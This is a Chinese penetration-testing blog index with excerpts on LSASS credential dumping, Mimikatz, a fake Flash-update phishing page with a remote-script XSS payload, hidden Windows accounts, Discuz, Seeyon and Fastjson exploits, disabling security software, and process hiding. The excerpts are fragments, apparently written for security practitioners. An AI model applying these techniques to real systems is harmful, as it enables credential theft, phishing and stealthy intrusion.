文章分类 - 渗透测试
摘要:dump LSASS的已知方法 微软签名工具 在所有可用的方法中,使用Microsoft签名的二进制文件是一种隐蔽获取LSASS内存转储的便捷的方法,尤其是当目标上已经存在它们时。使用这些方法可以阻止蓝队检测,因为像ProcDump这样的东西很难添加到黑名单中。 1.0 任务管理器 内置的任务管理器
阅读全文
posted @ 2021-06-30 10:56
小生观察室
摘要:下载Mimikatz 解压到当前目录随后使用Microsoft Visual Studio进行编译生成 使用Visual Studio 2010编译Mimikatz 菜单栏-->解决方案平台选择win32-->点击生成-->重新生成解决方案-->这里主要用来编译生成mimikatz 这里右击解决方案
阅读全文
posted @ 2021-06-29 22:38
小生观察室
摘要:Flash网站克隆源码 可通过CS或者其他第三方工具进行源码克隆下载并且修改 xss payload <script src="http://www.xxxx.cn/version.js"></script> version.js window.alert = function(name){ var
阅读全文
posted @ 2021-06-28 14:29
小生观察室
摘要:简介 帐户隐藏的方法 编写脚本实现思路 结合远程桌面多用户登录的利用思路 帐户隐藏的方法 1、对注册表赋予权限 默认注册表HKEY_LOCAL_MACHINE\SAM\SAM\只有system权限才能修改 现在需要为其添加管理员权限 右键-权限-选中Administrators,允许完全控制 如下图
阅读全文
posted @ 2021-01-26 13:58
小生观察室
摘要:漏洞分析: Discuz3.4默认安装微信登录,如果用户点了一下绑定微信,但没绑定,会写入common_member_wechatmp,wechat.inc.php 230行附近 会取出第一个用户,然后重复使用这个tmp,但是在取出后,seloginstatus($number,1296000)就会
阅读全文
posted @ 2020-09-02 12:43
小生观察室
摘要:简述 漏洞可于钓鱼活动、窃取数据或其他恶意软件操作以及其他操作。 漏洞详情描述 :https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-micros
阅读全文
posted @ 2020-08-31 12:16
小生观察室
摘要:受害机配置 受害机一般为windows系统 请求报文 POST /seeyon/htmlofficeservlet HTTP/1.1 Content-Length: 1111 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
阅读全文
posted @ 2020-08-30 19:01
小生观察室
摘要:1、利用DNSLOG测试Fastjson远程命令执行漏洞 测试Fastjson版本号:1.2.15直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。 { "a":{ "@type":"java.lang.Class", "val":"com.
阅读全文
posted @ 2020-08-13 17:42
小生观察室
摘要:工具下载地址: procdump https://docs.microsoft.com/en-us/sysinternals/downloads/procdump mimikatz https://github.com/gentilkiwi/mimikatz 1 、查看lsass.exe进程是否存在
阅读全文
posted @ 2020-08-03 16:50
小生观察室
摘要:压缩命令 压缩文件夹(不包含子目录): rar.exe a "压缩包保存路径文件名" "被压缩的文件夹路径" 压缩文件夹(包含子目录): rar.exe a -r "压缩包保存路径文件名" "被压缩的文件夹路径" 压缩文件夹(以时间命名压缩包): rar.exe a -ag -r -s -ibck
阅读全文
posted @ 2020-01-08 17:46
小生观察室
摘要:0×01 测试环境: 安全狗的进程: 安全狗的服务开启远程桌面守护远程登录测试:安全狗拦截 0×02 直入主题: 命令行下操作 tasklist |find “Safe” 最后一个进程SafeDogGuardCenter.exe是关键,记下它的PID:1032 然后接连两个指令 sc config
阅读全文
posted @ 2019-12-11 10:09
小生观察室
摘要:1.进程隐藏工具libprocesshider.so 此工具作用为劫持系统的readdir64和readdir函数,隐藏”proxy”进程。核心功能如下图: 当readdir函数被调用时,先调用系统的readdir函数,在readdir返回的进程名字里面去比较进程名字是否含有”proxy”,如果是p
阅读全文
posted @ 2019-11-27 09:49
小生观察室
摘要:0x01 验证是否存在CDN 方法1: 很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有: http://ping.chinaz.com/ http://ping.aizhan.com/ http://ce.cloud.36
阅读全文
posted @ 2019-02-27 11:19
小生观察室
摘要:方法一: 利用如下payload进行测试 其实就是发送web请求包,然后分析web服务器的响应状态,这里假设web服务器为:www.test.com第一个测试方法是通过telnet来实现的,过程如下 telnet www.test.com 80 GET / HTTP/1.1 Host: stuff
阅读全文
posted @ 2019-02-21 14:54
小生观察室

浙公网安备 33010602011771号